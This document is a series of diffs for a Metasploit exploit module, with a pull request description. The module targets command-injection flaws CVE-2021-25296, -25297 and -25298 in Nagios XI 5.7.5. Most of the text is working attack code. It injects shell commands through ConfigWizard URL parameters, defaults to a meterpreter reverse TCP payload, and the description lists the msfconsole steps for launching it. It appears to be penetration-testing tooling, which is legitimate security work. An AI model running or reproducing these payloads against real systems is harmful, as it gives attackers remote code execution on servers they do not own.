+    elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'
       url_params = url_params.merge({
         'nextstep' => 3,
         'wizard' => 'switch',
-        'ip_address' => "\"; #{cmd};",
+        address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
         'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alpha(7..15),
         'scaninterfaces' => 'on'
       })
-    elsif datastore['TARGET_CONFIG_WIZARD'] == 'digitalocean'
+    # CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by
+    # specifying the digitalocean option for the wizard parameter.
+    elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'
       url_params = url_params.merge({
-        'ip_address' => "; #{cmd};",
+        address_param => Array.new(4) { rand(256) }.join('.') + "; #{cmd};",
         'nextstep' => 4,
         'wizard' => 'digitalocean'
       })
     else
-      fail_with(Failure::BadConfig, 'Invalid TARGET_CONFIG_WIZARD: Choose windowswmi, switch, or digitalocean.')
+      fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')
     end
 
+    print_status('Sending the payload...')
+    # Send the final request. Note that the target is not expected to respond if we get
+    # code execution. Therefore, we set the timeout on this request to 0.
     send_request_cgi({
       'method' => 'GET',
       'uri' => '/nagiosxi/config/monitoringwizard.php',
@@ -199,7 +244,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if target.arch.first == ARCH_CMD
-      print_status('Executing the payload')
       execute_command(payload.encoded)
     else
       execute_cmdstager(background: true)

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -89,6 +89,9 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
+  # Returns a status code an a error message on failure.
+  # On success returns the status code and an array so we
+  # can update the login_result and res_array variables appropriately.
   def handle_unsigned_license(res_array, username, password, finish_install)
     auth_cookies, nsp = res_array
     sign_license_result = sign_license_agreement(auth_cookies, nsp)
@@ -128,12 +131,10 @@ class MetasploitModule < Msf::Exploit::Remote
       when 5 # The license agreement still needs to be signed
         login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
         return login_result, res_array unless (login_result == 0)
-
       end
     when 5 # The license agreement still needs to be signed
       login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
       return login_result, res_array unless (login_result == 0)
-
     end
 
     print_good('Successfully authenticated to Nagios XI.')
@@ -212,7 +213,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
     # changes from address to ip_address
-    if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.5.7')
+    if @version <= Rex::Version.new('5.5.7')
       address_param = 'address'
     else
       address_param = 'ip_address'
@@ -223,10 +224,10 @@ class MetasploitModule < Msf::Exploit::Remote
       url_params = url_params.merge({
         'nextstep' => 3,
         'wizard' => 'windowswmi',
-        'ip_address' => Rex::Text.rand_text_alpha(7..15),
-        'domain' => Rex::Text.rand_text_alpha(7..15),
-        'username' => Rex::Text.rand_text_alpha(7..20),
-        'password' => Rex::Text.rand_text_alpha(7..20),
+        'ip_address' => Array.new(4) { rand(256) }.join('.'),
+        'domain' => Rex::Text.rand_text_alphanumeric(7..15),
+        'username' => Rex::Text.rand_text_alphanumeric(7..20),
+        'password' => Rex::Text.rand_text_alphanumeric(7..20),
         'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
       })
     # CVE-2021-25297 affects the switch configuration wizard.
@@ -235,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'nextstep' => 3,
         'wizard' => 'switch',
         address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
-        'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alpha(7..15),
+        'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),
         'scaninterfaces' => 'on'
       })
     # CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -89,6 +89,26 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
+  def handle_unsigned_license(res_array, username, password, finish_install)
+    auth_cookies, nsp = res_array
+    sign_license_result = sign_license_agreement(auth_cookies, nsp)
+    if sign_license_result
+      return 5, 'Failed to sign license agreement'
+    end
+
+    print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
+    sleep 5
+    login_result, res_array = login_after_install_or_license(username, password, finish_install)
+    case login_result
+    when 1..4 # An error occurred, propagate the error message
+      return login_result, res_array[0]
+    when 5 # The Nagios XI license agreement still has not been signed
+      return 5, 'Failed to sign the license agreement.'
+    end
+
+    return login_result, res_array
+  end
+
   def authenticate
     # Use nagios_xi_login to try and authenticate.
     login_result, res_array = nagios_xi_login(username, password, finish_install)
@@ -106,38 +126,16 @@ class MetasploitModule < Msf::Exploit::Remote
       when 1..4 # An error occurred, propagate the error message
         return login_result, res_array[0]
       when 5 # The license agreement still needs to be signed
-        auth_cookies, nsp = res_array
-        sign_license_result = sign_license_agreement(auth_cookies, nsp)
-        if sign_license_result
-          return 5, 'Failed to sign license agreement'
-        end
+        code, message = handle_unsigned_license(res_array, username, password, finish_install)
+        return code, message unless (code == 0)
 
-        print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
-        sleep 5
-        login_result, res_array = login_after_install_or_license(username, password, finish_install)
-        case login_result
-        when 1..4 # An error occurred, propagate the error message
-          return login_result, res_array[0]
-        when 5 # The Nagios XI license agreement still has not been signed
-          return 5, 'Failed to sign the license agreement.'
-        end
+        login_result == code
       end
     when 5 # The license agreement still needs to be signed
-      auth_cookies, nsp = res_array
-      sign_license_result = sign_license_agreement(auth_cookies, nsp)
-      if sign_license_result
-        return 5, 'Failed to sign license agreement'
-      end
+      code, message = handle_unsigned_license(res_array, username, password, finish_install)
+      return code, message unless (code == 0)
 
-      print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
-      sleep 5
-      login_result, res_array = login_after_install_or_license(username, password, finish_install)
-      case login_result
-      when 1..4 # An error occurred, propagate the error message
-        return login_result, res_array[0]
-      when 5 # The Nagios XI license agreement still has not been signed
-        return 5, 'Failed to sign the license agreement.'
-      end
+      login_result == code
     end
 
     print_good('Successfully authenticated to Nagios XI.')

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -165,7 +165,12 @@ class MetasploitModule < Msf::Exploit::Remote
       url_params = url_params.merge({
         'nextstep' => 3,
         'wizard' => 'windowswmi',
-        datastore['TARGET_URL_PARAM'] => "9999; #{cmd};"
+        'check_wmic_plus_ver' => '1.65',
+        'ip_address' => Rex::Text.rand_text_alpha(7..15),
+        'domain' => Rex::Text.rand_text_alpha(7..15),
+        'username' => Rex::Text.rand_text_alpha(7..20),
+        'password' => Rex::Text.rand_text_alpha(7..20),
+        datastore['TARGET_URL_PARAM'] => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
       })
     else
       fail_with(Failure::BadConfig, 'Invalid TARGET_URL_PARAM: Choose ip_address or plugin_output_len')

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -1,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::NagiosXi
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Nagios XI 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
+        'Description' => %q{
+          This module exploits CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298,
+          OS command injection vulnerabilities in several file paths that enables an authenticated
+          user to perform remote code execution as either the `apache` user or the `www-data` user on NagiosXI
+          on Nagios XI 5.7.5
+
+          Valid credentials for a Nagios XI user are required. This module has
+          been successfully tested against Nagios XI 5.7.5 running on Ubuntu.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Matthew Mathur'
+        ],
+        'References' => [
+          ['CVE', 'CVE-2021-25296'],
+          ['CVE', 'CVE-2021-25297'],
+          ['CVE', 'CVE-2021-25298']
+        ],
+        'Platform' => %w[linux unix],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux (x86/x64)', {
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'CMD', {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'unix',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2021-02-13',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),
+      OptString.new('TARGET_URL_PARAM', [true, 'Targeted URL Parameter (plugin_output_len or ip_address)', 'plugin_output_len'])
+    ]
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def finish_install
+    datastore['FINISH_INSTALL']
+  end
+
+  def check
+    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
+    # an array containing the http response body of a get request to index.php and the session cookies
+    login_result, res_array = nagios_xi_login(username, password, finish_install)
+    case login_result
+    when 1..3 # An error occurred
+      return CheckCode::Unknown(res_array[0])
+    when 4 # Nagios XI is not fully installed
+      install_result = install_nagios_xi(password)
+      if install_result
+        return CheckCode::Unknown(install_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3 # An error occurred
+        return CheckCode::Unknown(res_array[0])
+      when 4 # Nagios XI is still not fully installed
+        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+      end
+    end
+
+    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
+    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
+    if login_result == 5 # the Nagios XI license agreement has not been signed
+      auth_cookies, nsp = res_array
+      sign_license_result = sign_license_agreement(auth_cookies, nsp)
+      if sign_license_result
+        return CheckCode::Unknown(sign_license_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3
+        return CheckCode::Unknown(res_array[0])
+      when 5 # the Nagios XI license agreement still has not been signed
+        return CheckCode::Detected('Failed to sign the license agreement.')
+      end
+    end
+
+    print_good('Successfully authenticated to Nagios XI')
+
+    # Obtain the Nagios XI version
+    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
+
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+    end
+
+    print_status("Target is Nagios XI with version #{nagios_version}")
+
+    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
+      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
+    end
+
+    # check if the target is actually vulnerable
+    version = Rex::Version.new(nagios_version)
+    if version == Rex::Version.new('5.7.5')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  # TODO: Change this based on the selected path
+  def execute_command(cmd, _opts = {})
+    # execute payload based on the selected URL Parameter
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/nagiosxi/config/monitoringwizard.php'),
+      'cookie' => @auth_cookies,
+      'vars_get' =>
+{
+  datastore['TARGET_URL_PARAM'] => "; #{cmd};"
+}
+    }, 0) # don't wait for a response from the target, otherwise the module will in most cases hang for a few seconds after executing the payload
+  end
+
+  def exploit
+    if target.arch.first == ARCH_CMD
+      print_status('Executing the payload')
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(background: true)
+    end
+  end
+end

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -18,21 +18,20 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Nagios XI 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
         'Description' => %q{
           This module exploits CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298,
-          OS command injection vulnerabilities in several file paths that enables an authenticated
-          user to perform remote code execution as either the `apache` user or the `www-data` user on NagiosXI
-          on Nagios XI 5.7.5
+          OS command injection vulnerabilities in several URL parameters that enables
+          an authenticated user to perform remote code execution on Nagios XI 5.7.5.
 
           Valid credentials for a Nagios XI user are required. This module has
-          been successfully tested against Nagios XI 5.7.5 running on Ubuntu.
+          been successfully tested against the official NagiosXI 5.7.5 OVA.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           'Matthew Mathur'
         ],
         'References' => [
-          ['CVE', 'CVE-2021-25296'],
-          ['CVE', 'CVE-2021-25297'],
-          ['CVE', 'CVE-2021-25298']
+          ['CVE', '2021-25296'],
+          ['CVE', '2021-25297'],
+          ['CVE', '2021-25298']
         ],
         'Platform' => %w[linux unix],
         'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
@@ -147,7 +146,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Safe
   end
 
-  # TODO: Change this based on the selected path
   def execute_command(cmd, _opts = {})
     # execute payload based on the selected URL Parameter
     send_request_cgi({

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
     # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
-    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
+    if /^\d{4}r\d(?:\.\d)?(?:(?:RC\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0'
       nagios_version = '1.0.0'
     end
     @version = Rex::Version.new(nagios_version)

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -133,9 +133,9 @@ class MetasploitModule < Msf::Exploit::Remote
       else
         return login_result, 'Failed to extract authentication cookies'
       end
-      nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)
+      nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/)
       if nsp
-        @nsp = nsp[0][0]
+        @nsp = nsp[0]
       else
         return login_result, 'Failed to extract nsp string'
       end

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -131,6 +131,8 @@ class MetasploitModule < Msf::Exploit::Remote
       nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)
       if nsp
         @nsp = nsp[0][0]
+      else
+        return login_result, 'Failed to extract nsp string'
       end
     else
       return login_result, 'Failed to extract auth cookies and nsp string'

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -122,6 +122,22 @@ class MetasploitModule < Msf::Exploit::Remote
           return 5, 'Failed to sign the license agreement.'
         end
       end
+    when 5 # The license agreement still needs to be signed
+      auth_cookies, nsp = res_array
+      sign_license_result = sign_license_agreement(auth_cookies, nsp)
+      if sign_license_result
+        return 5, 'Failed to sign license agreement'
+      end
+
+      print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
+      sleep 5
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..4 # An error occurred, propagate the error message
+        return login_result, res_array[0]
+      when 5 # The Nagios XI license agreement still has not been signed
+        return 5, 'Failed to sign the license agreement.'
+      end
     end
 
     print_good('Successfully authenticated to Nagios XI.')
@@ -246,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => '/nagiosxi/config/monitoringwizard.php',
       'cookie' => @auth_cookies,
       'vars_get' => url_params
-    }, 0)
+    })
   end
 
   def exploit


### PR DESCRIPTION
This PR adds an exploit module for three CVEs  (CVE-2021-25296, CVE-2021-25297, CVE-2021-25298) that perform command injection against NagiosXI 5.7.5. It utilizes the Nagios login mixin for target verification and authentication.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
- [x] `set RHOSTS TARGET_IP`
- [x] `set RPORT 443`
- [x] `set SSL true`
- [x] `set USERNAME USER`
- [x] `set PASSWORD PASSWORD`
- [x] `set TARGET_URL_PARAM plugin_output_len`
- [x] `set LHOST YOUR_IP`
- [x] `set LPORT YOUR_LISTENING_PORT`
- [x] `run`

## Vulnerable Software
The easiest way to test is against the official OVA (https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).) but installing it manually on linux is also an option.

![cve_msf](https://user-images.githubusercontent.com/9121784/213206424-326a97a8-9229-4916-83f3-2203261cd4c6.png)
